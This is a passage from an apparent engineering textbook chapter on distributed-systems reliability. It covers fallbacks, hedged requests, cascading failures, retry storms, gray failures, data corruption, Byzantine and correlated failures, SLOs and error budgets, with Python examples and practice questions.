return limiter.check(key, timeout_ms=20)
except (Timeout, ServiceUnavailable):
metrics.increment("fallback.ratelimit.open")
return True # FAIL OPEN: the limiter protects capacity, and
# taking the site down to enforce it is worse
Two operational cautions. A fallback path that is only exercised during incidents is untested code running at the worst possible moment — exercise it deliberately (a small percentage of traffic, or a scheduled drill). And every fallback must be instrumented, because a system quietly serving stale data to 100% of users looks exactly like a healthy system on an availability dashboard. The metric that catches this is not "errors"; it is "fraction of responses served from a fallback."
Key Takeaways
- Choose the fallback by asking what a wrong answer costs versus no answer.
- Stale-but-correct beats fresh-but-absent for most read paths.
- Fail closed for security decisions; fail open for protective mechanisms whose absence is less harmful than an outage.
- Instrument every fallback: undetected fallback serving looks identical to health on an availability dashboard.
- Exercise fallback paths in normal operation, or they are untested code that runs only during incidents.
🧪 Practice
- For five calls in a system you know, write down the fallback and the cost of it being wrong.
- Add a metric and an alert that fires when more than 5% of responses are served from a fallback for over ten minutes.
- Interview: Should a feature-flag service fail open or fail closed? (Hint: "it depends on the flag" is the start — what property of the flag decides it?)
Hedged Requests
Tail latency is a distinct problem from failure. A dependency can be up, healthy in aggregate, and still return the occasional very slow response — a garbage collection pause, a cold cache, a noisy neighbour, a queue behind one unlucky request. When a single user action fans out to many backend calls, those rare slow responses stop being rare: with 100 parallel calls each having a 1% chance of hitting the slow path, roughly 63% of user actions include at least one.
A hedged request attacks this directly. Send the request; if no answer has arrived by some threshold — typically the 95th percentile latency — send a second copy to a different replica and take whichever answer returns first. Because the threshold sits at p95, only about 5% of requests are ever duplicated, so the extra load is small, while the tail improves dramatically: the request now only appears slow if both attempts are slow, which for independent replicas is far less likely.
HEDGING AT THE 95th PERCENTILE
Without hedging:
request ----------------------------------------------> 480 ms (p99 path)
user waits 480 ms
With a hedge fired at p95 = 40 ms:
attempt 1 ---------------------------------------------> 480 ms (ignored)
attempt 2 |---------> 35 ms
^
hedge sent at t=40 ms to a DIFFERENT replica
response at t = 40 + 35 = 75 ms
Cost: ~5% extra requests (only those slower than p95 are ever duplicated).
Benefit: p99 collapses toward p95 + p50 rather than staying at the tail.
import asyncio
async def hedged_call(send, replicas, hedge_after_ms, deadline_ms):
"""Send to one replica; duplicate to another if it is slow. First wins."""
tasks, delay = [], hedge_after_ms / 1000
try:
for replica in replicas: # usually 2 attempts, no more
tasks.append(asyncio.create_task(send(replica)))
done, pending = await asyncio.wait(
tasks, timeout=delay, return_when=asyncio.FIRST_COMPLETED
)
if done:
return done.pop().result() # first answer wins
delay = (deadline_ms - hedge_after_ms) / 1000 # wait out the rest
done, _ = await asyncio.wait(tasks, timeout=delay,
return_when=asyncio.FIRST_COMPLETED)
if not done:
raise DeadlineExceeded()
return done.pop().result()
finally:
for t in tasks:
t.cancel() # ALWAYS cancel losers: an uncancelled hedge is
# duplicated work that the server still performs
Hedging comes with three hard preconditions. The operation must be idempotent or read-only, because two copies of it will sometimes both execute. The hedge must go to a different replica, or you are simply adding load to the machine that was already slow. And the system must bound the hedge rate — a global cap of a few percent — because during a broad slowdown every request exceeds the p95 threshold and naive hedging doubles the load on a system that is already struggling, which is a retry storm by another name.
A related and simpler variant is the tied request: send to two replicas immediately, and have each replica, on starting the work, tell the other to cancel. This trades a little coordination for a better tail than threshold-based hedging, and it is what some storage systems use for reads.
Key Takeaways
- Hedging targets tail latency, not failure: send a duplicate when the first attempt exceeds a threshold and take the first response.
- Setting the threshold at p95 costs about 5% extra requests and pulls p99 down toward p95 plus a typical response.
- Fan-out amplifies tails — with 100 parallel calls, a 1% slow path affects roughly 63% of user actions.
- Preconditions: idempotent work, a different replica, and cancellation of the loser.
- Cap the hedge rate globally, or a system-wide slowdown turns hedging into a load multiplier.
🧪 Practice
- Compute the probability that at least one of 20 parallel calls hits a 1% slow path, and repeat for 50 and 200 calls.
- Add a global rate cap to
hedged_callso no more than 5% of requests are hedged in any minute.- Interview: Why is hedging dangerous for writes, and what would you need to change to make it safe? (Hint: think about what the server does when both copies of the request arrive and complete.)
<a id="93-failure-modes"></a>
9.3 Failure Modes
The patterns in the previous subchapter are answers. This subchapter is the set of questions — the specific ways distributed systems break at scale, most of which are emergent: no single component is defective, yet the system as a whole fails.
Cascading Failures
A cascading failure is one where the failure of a part shifts load onto the remaining parts, overloading them in turn, until the whole system is down. The defining property is that the system fails because it tried to compensate. This is why cascading failures are so damaging: the redundancy that was supposed to save you is the transmission mechanism.
The canonical form is capacity redistribution. Three nodes each handle 1000 rps at their limit, and the fleet serves 2100 rps — 700 per node, a comfortable 70%. One node dies. The remaining two now receive 1050 rps each, which is above their capacity. They slow down, their queues grow, health checks start failing, and one of them is marked unhealthy and removed. The last node now receives 2100 rps, and the system is gone. The trigger was one node; the cause was the absence of enough headroom to absorb it.
CAPACITY REDISTRIBUTION CASCADE
t=0 [A 700] [B 700] [C 700] capacity 1000 each, 70% utilized
t=1 [A X ] [B1050] [C1050] A dies; load redistributes above capacity
t=2 [B slow] [C slow] queues grow, latency climbs, timeouts begin
t=3 [B X ] [C2100] B fails a health check and is removed
t=4 [C X ] total outage from ONE node failure
The same fleet at 60% (1800 rps) survives: 900 rps each after A dies, under
the 1000 limit. Headroom is not waste; it is the cascade brake.
Cascades have three other common shapes worth recognizing. Retry amplification, where clients respond to slowness by generating more load (next topic). Resource exhaustion, where one dependency's slowness consumes a shared pool (the bulkhead problem). And death spirals on recovery, where a restarted service is immediately hit by the full backlog of queued and retrying work, falls over again, and never gets a chance to warm caches or fill connection pools.
The mechanism underneath all of them is queueing. As utilization approaches 100%, queue length — and therefore latency — grows without bound. This is not a linear degradation; it is a cliff.
# Why load shedding beats queueing under overload.
arrival_rps, capacity_rps = 1200, 1000
# Option 1: queue the excess.
backlog = 0
for second in range(1, 61):
backlog += arrival_rps - capacity_rps # +200 requests every second
print(backlog) # 12000 queued after one minute
print(f"{backlog / capacity_rps:.0f} s") # 12 s of queue wait -- and by
# now every one of those queued requests has already timed out on the client,
# so the server spends 100% of its capacity producing answers nobody reads.
# Option 2: shed the excess immediately.
served, shed = capacity_rps, arrival_rps - capacity_rps
print(f"{served / arrival_rps:.0%} served fast, {shed / arrival_rps:.0%} rejected")
# 83% served fast, 17% rejected -- a far better outcome than 100% timing out.
# The queueing multiplier at various utilizations (M/M/1 intuition, 1/(1-u)):
for u in (0.5, 0.8, 0.9, 0.95, 0.99):
print(f"utilization {u:.0%} -> latency multiplier {1 / (1 - u):>5.1f}x")
# 50% -> 2.0x 80% -> 5.0x 90% -> 10.0x 95% -> 20.0x 99% -> 100.0x
The defenses follow from the mechanism. Keep enough headroom that the loss of one failure domain does not push the rest above capacity. Shed load at the edge instead of queueing it, and shed by priority so the important work survives. Use bulkheads so exhaustion stays local. Make health checks shallow enough that an overloaded-but-working instance is not removed, worsening the very overload that caused it. And plan for recovery explicitly: bring capacity back gradually, drop the backlog rather than replaying it, and let caches warm before admitting full traffic.
Key Takeaways
- A cascading failure spreads through the compensation mechanism, which is why redundancy alone does not prevent it.
- The core arithmetic: after losing one of N domains, the rest must stay under capacity, so utilization must stay below (N-1)/N.
- Queueing under sustained overload is a cliff — latency grows without bound and the server does work no client is still waiting for.
- Shed load early and by priority; queueing excess work makes the outage worse.
- Design the recovery path: gradual traffic admission, backlog drops, cache warm-up.
🧪 Practice
- For a 4-node fleet with 1000 rps capacity per node, find the maximum steady load that survives losing two nodes.
- Add priority-aware shedding to a queue: drop background work before user requests when queue depth exceeds a threshold.
- Interview: Your service crashed under load, you restarted it, and it crashed again immediately. What is happening and what do you do? (Hint: consider what is waiting for it at the moment it comes back, and what a cold cache means for its capacity.)
Retry Storms
A retry storm is the specific cascade in which clients, responding correctly at the individual level, collectively destroy the dependency they are trying to reach. Every client is behaving reasonably: the call failed, so it tries again. The aggregate behaviour is a load multiplier applied at exactly the moment the system has the least capacity to absorb it.
The arithmetic is brutal and it compounds across layers. Suppose a service normally receives 1000 rps and begins failing. Each client retries twice, so the service now sees 3000 rps. If the client is itself a service whose own callers retry twice, the chain multiplies again: three layers of "just two retries" is 27 attempts per original user request.
RETRY AMPLIFICATION ACROSS LAYERS
user request 1 attempt
|
mobile client x3 3 attempts (2 retries)
|
API gateway x3 9 attempts (2 retries)
|
service x3 27 attempts (2 retries)
|
database 27x its normal load, during an incident
Each layer's policy is defensible in isolation. The product is not.
What makes storms self-sustaining is that they outlive their trigger. A dependency has a 30-second problem; by the time it recovers, a large backlog of retrying clients is waiting, and the instant it accepts connections it is hit with many times normal load and fails again. The system is now down not because of the original fault but because of the response to it — a metastable failure that persists until load is forcibly removed.
def storm_load(base_rps, retries_per_layer, layers, failure_rate):
"""Load reaching the bottom layer during a partial failure."""
amplification = (1 + retries_per_layer) ** layers
# Only failing requests are retried, so amplification scales with the
# failure rate -- which is precisely why a partial failure escalates into
# a total one as the failure rate climbs.
effective = base_rps * (1 - failure_rate) + base_rps * failure_rate * amplification
return effective
for rate in (0.0, 0.05, 0.25, 0.50, 1.0):
print(f"failure rate {rate:>4.0%} -> {storm_load(1000, 2, 3, rate):>8.0f} rps")
# failure rate 0% -> 1000 rps
# failure rate 5% -> 2300 rps <- already over capacity
# failure rate 25% -> 7500 rps
# failure rate 50% -> 14000 rps
# failure rate 100% -> 27000 rps <- 27x, and it will not recover alone
The defenses are cumulative, and each one alone is insufficient:
| Defense | What it bounds | Where it lives |
|---|---|---|
| Retry only one layer | The exponent in the amplification | Architecture rule |
| Exponential + jitter | The synchronization of retry waves | Client library |
| Retry budget (~10%) | Total systemic amplification | Client library |
| Circuit breaker | Retries against a dependency that is down | Caller |
| Load shedding / 429 | What the server accepts at all | Server, edge |
Retry-After header | When clients are allowed back | Server response |
| Randomized admission | The thundering herd on recovery | Server, edge |
The server-side half is the part teams forget. A dependency that is failing should
say so in a way clients must obey: return 429 or 503 with a Retry-After, and
admit traffic gradually on recovery rather than opening the gates. You cannot rely
on every client — especially third-party or mobile ones you cannot redeploy — to
implement backoff correctly, so the server must be able to protect itself from
badly behaved callers.
Key Takeaways
- Retry amplification is multiplicative across layers: 2 retries at 3 layers is 27x load.
- Storms are metastable — they persist after the original fault is fixed, because the recovering system is hit with the accumulated backlog.
- Retry at exactly one layer, with jitter and a global retry budget.
- Servers must defend themselves: 429/503 with
Retry-After, load shedding, and gradual admission on recovery.- You cannot assume clients behave; mobile and third-party callers cannot be redeployed mid-incident.
🧪 Practice
- Compute the amplification for 1 retry across 4 layers, and compare it with 3 retries at 2 layers.
- Implement
Retry-Afterhandling in a client so it waits the server-specified duration instead of its own backoff.- Interview: How would you bring a service back after a retry storm has taken it down? (Hint: it cannot simply start accepting traffic — what needs to happen to the waiting load first?)
Gray Failures and Slow Nodes
A crash is the easiest failure to handle: the process is gone, health checks fail, the load balancer removes it, and traffic moves. A gray failure is the difficult opposite — the component is up, responds to health checks, and is nevertheless failing to do its job for some or all of its users. It is the failure mode that produces the longest incidents, because monitoring says everything is fine.
Gray failures arise from a difference in perspective. The system's own view (a health-check endpoint returning 200) and the client's view (requests timing out) disagree, and automated recovery keys off the wrong one. The instance stays in rotation, keeps receiving its share of traffic, and keeps failing it.
DIFFERENTIAL OBSERVABILITY: THE SIGNATURE OF A GRAY FAILURE
health checker ---> GET /healthz ---> [ node C ] ---> 200 OK
(cheap, local, no dependencies)
real client ------> POST /orders ---> [ node C ] ---> timeout
(needs the DB pool that node C has exhausted)
Result: C stays in the load balancer pool, receives ~1/N of all traffic,
and fails ~1/N of user requests indefinitely. Aggregate dashboards show
an error rate of 1/N -- often small enough to sit under the alert threshold.
Common shapes: a node whose disk is failing and whose I/O now takes seconds; a process in a garbage-collection death spiral, alive but pausing constantly; a network interface with a high packet-drop rate; a node with a corrupted routing table that can reach some peers and not others; a replica that has fallen hours behind and is serving stale reads; a partially-deployed release where one instance runs incompatible code.
The counter-measures share one theme: judge health by what clients experience, per instance.
# Client-side outlier detection: peers vote on who is sick.
def detect_outliers(stats, min_requests=50, latency_factor=3.0, error_margin=0.10):
"""stats: {instance: (requests, errors, p99_latency_ms)}"""
healthy = [s for s in stats.values() if s[0] >= min_requests]
if len(healthy) < 3:
return [] # too small a sample to judge
median_p99 = sorted(s[2] for s in healthy)[len(healthy) // 2]
median_err = sorted(s[1] / s[0] for s in healthy)[len(healthy) // 2]
ejected = []
for name, (reqs, errors, p99) in stats.items():
if reqs < min_requests:
continue
# An instance is an outlier only relative to its PEERS -- this survives
# a general slowdown, where every instance degrades together.
if p99 > median_p99 * latency_factor or errors / reqs > median_err + error_margin:
ejected.append(name)
# Never eject so many that the survivors are overloaded: cap at ~10% of the
# fleet, or outlier detection becomes the cause of a cascade.
return ejected[: max(1, len(stats) // 10)]
print(detect_outliers({
"node-a": (1000, 8, 45),
"node-b": (1000, 11, 50),
"node-c": (1000, 12, 900), # 18x the median p99: a gray failure
"node-d": (1000, 9, 47),
}))
# ['node-c']
Beyond outlier ejection, the practical toolkit is: deep health checks that actually touch critical dependencies (while keeping them cheap enough not to become a load source); per-instance metrics rather than fleet averages, since an average of 20 healthy nodes and one sick one looks healthy; latency percentiles per instance; replication-lag monitoring so a stale replica is removed from the read pool; and a low-friction "just restart or replace it" reflex — for a stateless node, replacement is almost always faster than diagnosis.
Key Takeaways
- Gray failures are partial: the component passes health checks while failing real work, so automation does not remove it.
- Their signature is differential observability — the system's view and the client's view disagree.
- Fleet averages hide them; measure error rate and latency per instance.
- Peer-relative outlier detection (with an ejection cap) removes sick nodes without over-reacting to a general slowdown.
- For stateless instances, replacement beats diagnosis.
🧪 Practice
- Design a health check that would catch an exhausted database connection pool without itself becoming a significant load on the database.
- Extend the outlier detector to require that an instance be an outlier in two consecutive windows before ejection, and explain why that helps.
- Interview: One instance in a fleet of 30 is silently failing 100% of its requests. What does the aggregate error-rate dashboard show, and how would you have caught it? (Hint: compute the aggregate rate, then compare it with a typical alert threshold.)
Data Corruption and Bit Rot
Compute failures are loud and recoverable: restart the process and the bad state is gone. Data failures are quiet and permanent. A corrupted byte can sit undetected for months, be dutifully copied into every replica and every backup, and only surface when someone reads it — by which point every clean copy has aged out of retention.
Corruption is not rare at scale, because the underlying error rates are per-bit and the bit counts are enormous. Consumer drives are commonly specified around one unrecoverable read error per 10^14 bits, which is roughly one error per 12 TB read. Add cosmic-ray bit flips in non-ECC memory, firmware bugs, truncated writes during power loss, and — the most common source in practice — application bugs that write wrong data through a perfectly healthy storage stack.
# Why "rare" per-bit errors are not rare at fleet scale.
ure_rate_per_bit = 1e-14 # a common consumer-drive specification
bytes_read = 12e12 # 12 TB, one full drive scan
expected_errors = bytes_read * 8 * ure_rate_per_bit
print(f"{expected_errors:.2f}") # 0.96 -- about one error per full-drive read
# A 1000-drive fleet scrubbed monthly reads 12 PB/month:
print(f"{1000 * expected_errors:.0f} errors/month expected") # ~960
# Silent corruption is not an edge case; it is a monthly operational event.
The critical distinction is between corruption you detect and corruption you do not. Replication protects against loss but happily replicates corruption, so the defense must be verification, not duplication.
DEFENSE IN DEPTH FOR DATA INTEGRITY
write path
application --> checksum computed HERE, over the logical record
| (end-to-end: catches bugs in every layer below)
serialization
|
filesystem --> per-block checksums (ZFS, Btrfs)
|
device --> ECC, T10-DIF
v
[ replica 1 ] [ replica 2 ] [ replica 3 ]
\ | /
\ | /
background SCRUBBING: read every block, verify its checksum,
repair from a good replica, and REPORT the rate
read path: verify the end-to-end checksum before returning data to the user.
Four practices carry most of the weight. End-to-end checksums computed by the application and verified on read catch corruption introduced by any layer in between, including your own code. Background scrubbing finds errors while good copies still exist, rather than at read time when they may not. Immutable, versioned storage means a bad write creates a new version instead of destroying the old one. And backup verification — restoring and checking, on a schedule — is the only way to know a backup is not itself corrupt.
Two failure modes deserve specific mention. Backups that silently propagate corruption are defeated by keeping enough versions to reach back before the corruption began, which requires knowing when that was — hence the value of scrubbing metrics as a time series. And logical corruption caused by an application bug or a bad migration is invisible to every checksum in the stack, because the bytes were written correctly; catching it needs semantic validation: invariant checks, reconciliation jobs, and continuous comparison against a derived source of truth.
Key Takeaways
- Per-bit error rates make silent corruption a routine event at fleet scale, not an edge case.
- Replication copies corruption faithfully; only verification detects it.
- End-to-end application-level checksums catch errors that per-layer checksums cannot, including your own bugs.
- Scrub in the background so errors are found while a good copy still exists.
- Logical corruption passes every checksum; catching it requires semantic invariant checks and reconciliation.
- A backup is only verified once it has been restored and checked.
🧪 Practice
- Compute the expected number of unrecoverable read errors when scrubbing 500 TB monthly at 10^-15 errors per bit.
- Add an end-to-end checksum to a record write path and verify it on read, emitting a metric on mismatch.
- Interview: A bad migration corrupted a column three weeks ago and all backups contain it. What now? (Hint: think about what other records of the same events exist — logs, event streams, downstream systems.)
Byzantine Failures
Most fault-tolerance work assumes fail-stop behaviour: components either work correctly or stop entirely. A Byzantine failure breaks that assumption — the component keeps running and produces wrong output, possibly different wrong output to different peers. The name comes from Lamport's Byzantine Generals problem, where generals must agree on a plan while some of them may be traitors sending contradictory messages.
This matters because ordinary redundancy is defenseless against it. Three replicas protect you against one crashing. They do not protect you against one returning plausible-but-wrong answers, because the failure detector cannot tell a wrong answer from a right one — nothing is timing out, nothing is erroring.
The classical result is the bound: tolerating f Byzantine faults requires 3f + 1 participants, versus 2f + 1 for crash faults. The extra replicas are what allow a correct majority to exist even when the faulty nodes actively lie.
| Fault model | Nodes to tolerate f faults | Nodes for f=1 | Typical protocol |
|---|---|---|---|
| Crash-stop | 2f + 1 | 3 | Raft, Paxos |
| Byzantine | 3f + 1 | 4 | PBFT, Tendermint |
In practice, most engineers will never run a BFT consensus protocol; those live in blockchains, aerospace control systems, and a few financial settlement networks, because the cost — more replicas, more message rounds, cryptographic signatures on everything — is high. What is far more common is Byzantine-ish behaviour from ordinary bugs: a node running an old release computing prices with a stale tax table, a service returning HTTP 200 with a truncated body, a client sending malformed data that a lenient parser accepts, or a partially-failed disk returning data that is wrong but structurally valid.
# Practical Byzantine-resistant checks for ordinary systems.
def verified_response(responses):
"""Cross-check independent sources when a wrong answer is expensive."""
# 1. Quorum agreement: require a majority to produce identical answers.
from collections import Counter
counts = Counter(canonical(r) for r in responses)
answer, votes = counts.most_common(1)[0]
if votes <= len(responses) // 2:
raise NoQuorum(f"responses disagree: {dict(counts)}")
return answer
def accept_write(record, signature, sender_key):
# 2. Authentication: a wrong message from an untrusted source is rejected
# before it can influence anything.
if not verify_signature(record, signature, sender_key):
raise Untrusted(record.id)
# 3. Validation: enforce invariants rather than trusting the sender.
assert 0 <= record.amount <= MAX_TRANSFER, "amount out of range"
assert record.currency in SUPPORTED, "unknown currency"
assert record.version == EXPECTED_SCHEMA_VERSION, "schema mismatch"
return commit(record)
def reconcile_daily(ledger_total, bank_statement_total):
# 4. Reconciliation: an independently derived total is the cheapest possible
# Byzantine detector for a financial system.
if abs(ledger_total - bank_statement_total) > TOLERANCE:
raise ReconciliationBreak(ledger_total, bank_statement_total)
The practical takeaway is to spend the effort on the cheap defenses. Authenticate every internal call so a compromised or confused component cannot impersonate another. Validate inputs against invariants at every boundary, including from services you own. Use checksums and versions so a stale or truncated response is detectable. And reconcile against an independent source for anything financial. Full BFT consensus is reserved for the case where the participants are genuinely adversarial and mutually distrusting — which is exactly the case blockchains were built for.
Key Takeaways
- Byzantine failures produce wrong output rather than no output, so failure detectors and ordinary redundancy do not catch them.
- Tolerating f Byzantine faults needs 3f + 1 nodes, versus 2f + 1 for crashes.
- Full BFT protocols are rare outside adversarial settings because of their cost.
- The common real-world version is buggy or stale components, not malice.
- Cheap defenses — authentication, input validation, checksums, version checks, and reconciliation — cover most practical cases.
🧪 Practice
- Explain why 3 nodes cannot tolerate 1 Byzantine fault, using a concrete scenario of contradictory messages.
- Add schema-version validation to a service boundary so an old client's messages are rejected rather than misinterpreted.
- Interview: A replica silently returns stale data after a failed upgrade. Is that a Byzantine failure, and how would you detect it? (Hint: ask whether the output is wrong versus absent, and what independent signal would reveal it.)
Correlated Failures
Every availability calculation in this chapter multiplies failure probabilities, and every one of those multiplications assumes independence. Correlated failures are what happens when that assumption is false — when one event takes out multiple "redundant" components at once — and they are the reason real systems fail far more often than their arithmetic predicts.
The arithmetic is unforgiving. Three replicas each with 1% failure probability give six nines if independent. If a single common cause has a 0.5% chance of taking out all three simultaneously, the system's failure probability is dominated entirely by that 0.5% — the redundancy contributes essentially nothing. Redundancy multiplies only the independent part of the risk; the correlated part it leaves untouched.
def system_failure_probability(p_individual, replicas, p_common_cause):
independent = p_individual ** replicas # all fail on their own
return independent + p_common_cause # plus the shared-fate event
print(f"{system_failure_probability(0.01, 3, 0.0):.8f}") # 0.00000100
print(f"{system_failure_probability(0.01, 3, 0.005):.8f}") # 0.00500100
# Adding a fourth and fifth replica moves the first term only:
print(f"{system_failure_probability(0.01, 5, 0.005):.8f}") # 0.00500000
#
# The lesson: once a common cause dominates, MORE REPLICAS BUY NOTHING. The
# only useful work is removing the shared dependency.
Correlation hides in shared fate, and shared fate has more dimensions than people usually enumerate:
| Dimension | Shared thing | Failure it causes |
|---|---|---|
| Physical | Rack, power feed, top-of-rack switch | All replicas in one rack disappear |
| Geographic | Datacenter, metro, power grid | A regional event takes the zone |
| Software | The same release, the same bug | A bad deploy fails everywhere at once |
| Configuration | One global config push | Instant, simultaneous, global misbehaviour |
| Time | Certificates, leap seconds, epochs | Everything expires at the same instant |
| Dependency | One DNS provider, one auth service | Every replica loses the same upstream |
| Behavioural | Synchronized retries, cron at :00 | Self-inflicted load spikes |
| Capacity | A shared upstream at its limit | Failover exceeds the surviving capacity |
The most common correlated failure in modern systems is not physical at all — it is a deploy or a configuration change, because those reach every replica by design. That is why the operational answer is to break the correlation in time: stagger rollouts across instances, zones, and regions, with soak intervals and automatic rollback, so that the blast radius of a bad change is one wave rather than the fleet.
# Turning a correlated risk into a sequential one.
ROLLOUT = [
("canary", 0.01, "30m"), # 1% of one zone, watched closely
("zone-a", 0.33, "2h"), # one failure domain at a time
("zone-b", 0.66, "2h"), # a soak interval long enough for slow bugs
("zone-c", 1.00, None), # (memory leaks, cron jobs, cache expiry)
]
def promote(stage, slo_burn_rate):
# The gate is the SLO, not a human's impression of the dashboard.
if slo_burn_rate > 2.0:
return rollback(stage)
return advance(stage)
# Config changes need the SAME treatment as code. A global config push is the
# fastest way ever invented to make an identical mistake in every region at
# the same instant.
Two further habits help. Make failure domains explicit in scheduling — anti-affinity rules so replicas of the same shard are never on one rack or one zone — and audit them, since a scheduler will happily co-locate everything if the constraint is not declared. And track the "expiry class" of correlated risks: certificates, tokens, license keys, and hardcoded dates fail simultaneously for everyone, and are best handled by automated rotation with alerting well before the deadline.
Key Takeaways
- Availability arithmetic assumes independence; correlated failures are where real systems deviate from the model.
- Once a common cause dominates, adding replicas buys nothing — remove the shared dependency instead.
- Shared fate spans physical, software, configuration, temporal, and dependency dimensions, not just hardware.
- The most common correlated failure today is a code or config rollout, so stagger both across failure domains with SLO-gated promotion.
- Declare anti-affinity explicitly and audit it; schedulers co-locate by default.
🧪 Practice
- List every component your service depends on that has exactly one instance globally, including third parties.
- Compute how much a fourth replica improves availability when a common cause contributes 0.2% failure probability.
- Interview: Your three availability zones are independent, yet a single deploy took down all three. How do you prevent a recurrence without slowing releases to a crawl? (Hint: correlation in space was already broken — which dimension is left?)
<a id="94-reliability-practice"></a>
9.4 Reliability Practice
Architecture sets the ceiling on reliability; practice determines whether you reach it. This subchapter covers the operational machinery — how reliability is measured and negotiated, how failure is rehearsed deliberately, and how the organization learns from the failures it did not choose.
SLI, SLO, and SLA Definitions
Reliability discussions go in circles until three terms are separated. An SLI (Service Level Indicator) is a measurement: a number describing how well the service performed. An SLO (Service Level Objective) is an internal target for that number. An SLA (Service Level Agreement) is an external contract that attaches consequences — usually financial — to missing a target.
The order matters because each depends on the previous one. You cannot set a target for something you do not measure, and you must never sign a contract at the same threshold as your internal target: the SLO should be strictly stricter than the SLA, so that missing the SLO is an internal warning rather than a customer refund.
| Term | Audience | Nature | Example |
|---|---|---|---|
| SLI | Engineers | Measurement | Fraction of requests under 300 ms, per 1 min |
| SLO | Internal | Target | 99.9% of requests under 300 ms over 30 days |
| SLA | Customer | Contract | 99.5% monthly, or a 10% service credit |
A good SLI has a specific shape: a ratio of good events to valid events, measured where the user is. That definition rules out most of the metrics teams reach for first. CPU utilization is not an SLI — no user cares. Uptime of a process is not an SLI — the process can be up and useless. An average latency is a poor SLI, because an average hides exactly the tail the user notices.
# An SLI as a ratio of good events to valid events.
def availability_sli(requests):
# "Valid" excludes what the service is not responsible for: client errors
# (4xx, except 429), health checks, and traffic from load tests.
valid = [r for r in requests
if not r.is_synthetic and not (400 <= r.status < 500 and r.status != 429)]
good = [r for r in valid if r.status < 500 and r.latency_ms < 300]
return len(good) / len(valid) if valid else 1.0
# The threshold must come from user behaviour, not from what is convenient:
# - 300 ms because measured abandonment climbs sharply past it
# - measured at the load balancer, because that is closest to the user
# - per endpoint class, because a search and a checkout are different products
SLO = {
"checkout": {"target": 0.999, "latency_ms": 300, "window_days": 30},
"search": {"target": 0.995, "latency_ms": 500, "window_days": 30},
"reporting": {"target": 0.99, "latency_ms": 5000, "window_days": 30},
}
Two choices inside an SLO definition do most of the work. The measurement point decides what you are actually promising: server-side metrics miss network and DNS failures that the client experiences, so client-side or load-balancer measurement is closer to the truth. The window decides how it behaves: a rolling 30-day window responds smoothly and is what engineering should watch, while calendar months are what contracts use because they are unambiguous for billing.
Finally, resist the temptation to set the target as high as possible. An SLO should sit just above the level at which users become unhappy, because every nine above that is spent effort that could have gone into features — and, more subtly, because users will come to depend on whatever reliability you actually deliver, regardless of what you promised.
Key Takeaways
- SLI = measurement, SLO = internal target, SLA = external contract with consequences; set the SLO strictly stricter than the SLA.
- A good SLI is a ratio of good events to valid events, measured close to the user, with an explicit definition of "valid".
- Percentile-based latency thresholds beat averages, which hide the tail.
- Set targets per endpoint class; a search and a checkout have different reliability requirements.
- Do not over-target: reliability above what users notice is spent budget.
🧪 Practice
- Write an SLI definition for a file-upload endpoint, being explicit about which events count as valid.
- Explain what changes if the same SLO is measured at the client rather than at the server, and which failures each misses.
- Interview: A team proposes a 99.99% SLO for an internal batch reporting service. How do you respond? (Hint: ask what a user does differently when it is unavailable for ten minutes.)
Error Budgets
An error budget is the reframing that makes SLOs actionable. If the SLO is 99.9%, then 0.1% unreliability is not a failure — it is an allowance, deliberately granted. Over a 30-day window that allowance is 43.2 minutes of downtime, or 10,000 failed requests out of 10 million. Spending it is permitted. Running out has consequences.
This changes the conversation in a specific way. "Should we ship this risky feature?" is unanswerable in the abstract and usually resolved by whoever argues hardest. "Do we have budget remaining?" is a data question with an agreed-upon answer, which is why error budgets are the mechanism that stops the perpetual argument between teams that want to ship and teams that want stability. The policy, agreed in advance: budget remaining means ship; budget exhausted means the next work item is reliability, not features.
def error_budget_status(target, window_days, total_requests, failed_requests):
allowed_failures = total_requests * (1 - target)
consumed = failed_requests / allowed_failures if allowed_failures else 1.0
return {
"allowed": round(allowed_failures),
"used": failed_requests,
"remaining_pct": round((1 - consumed) * 100, 1),
"downtime_budget_min": round(window_days * 24 * 60 * (1 - target), 1),
}
print(error_budget_status(0.999, 30, 10_000_000, 6_500))
# {'allowed': 10000, 'used': 6500, 'remaining_pct': 35.0,
# 'downtime_budget_min': 43.2}
#
# 35% of the month's budget left, with the month not yet over: this is the
# signal to slow risky changes down, before the budget is actually gone.
The operational half of error budgets is the burn rate: how fast the budget is being consumed relative to the rate that would exactly exhaust it over the window. A burn rate of 1 means you will finish the window exactly at the target. A burn rate of 14.4 means one hour of this consumes 2% of a 30-day budget. Alerting on burn rate rather than on a raw error threshold is what gives you alerts that are both fast for severe incidents and quiet for minor ones.
def burn_rate(observed_error_rate, target):
return observed_error_rate / (1 - target) # 1.0 = exactly on budget
# The multi-window, multi-burn-rate alerting policy (SRE standard practice):
ALERT_POLICY = [
# burn long window short window budget consumed action
(14.4, "1h", "5m", "2%", "page immediately"),
(6.0, "6h", "30m", "5%", "page"),
(3.0, "24h", "2h", "10%", "ticket"),
(1.0, "72h", "6h", "10%", "ticket"),
]
# Two windows are required: the long one establishes that the burn is real,
# the short one confirms it is STILL happening, so the alert resolves once the
# incident ends instead of firing for hours afterwards.
print(f"{burn_rate(0.0144, 0.999):.1f}") # 14.4 -> a 1.44% error rate pages
print(f"{burn_rate(0.0012, 0.999):.1f}") # 1.2 -> slightly over budget, ticket
Three practices keep budgets honest. Agree the exhaustion policy in writing before it matters — a freeze on risky changes, or a fixed allocation of the next sprint to reliability work — since negotiating it during an incident guarantees it will not be honoured. Account for planned spend: deliberately taking a maintenance window is a legitimate budget expense, and one of the healthier uses of a surplus. And when a budget is consistently unspent, treat that as its own signal: either the target is too loose to be meaningful, or the team is being more conservative than the business needs.
Key Takeaways
- The error budget is the inverse of the SLO — an explicit, permitted allowance of unreliability.
- It converts "should we ship?" from an argument into a data question with a pre-agreed policy.
- Alert on burn rate, not raw error counts; multi-window policies page fast for severe burns and file tickets for slow ones.
- Write the exhaustion policy down before you need it.
- A budget that is never spent means the target is wrong or the team is too cautious.
🧪 Practice
- Compute the request-count error budget for a 99.95% SLO over a month with 40 million requests.
- Implement a burn-rate calculation over both a 1-hour and a 5-minute window and fire only when both exceed the threshold.
- Interview: The error budget is exhausted on day 12 of a 30-day window and a major launch is scheduled for day 15. What do you do? (Hint: the policy should already exist — what should it say, and who agreed to it?)
Chaos Engineering
Chaos engineering is the practice of injecting failures into a system on purpose, in order to find out what actually happens rather than what the design document claims. Its premise is that every complex system contains failure modes nobody has thought of, and the choice is only between discovering them during a controlled experiment on a Tuesday afternoon or during a real incident at 3 a.m.
The name is unfortunate — the practice is not about randomness. A chaos experiment is a scientific experiment with a steady state, a hypothesis, a blast radius, and an abort condition. "Randomly break things in production" is not chaos engineering; it is an outage you caused yourself.
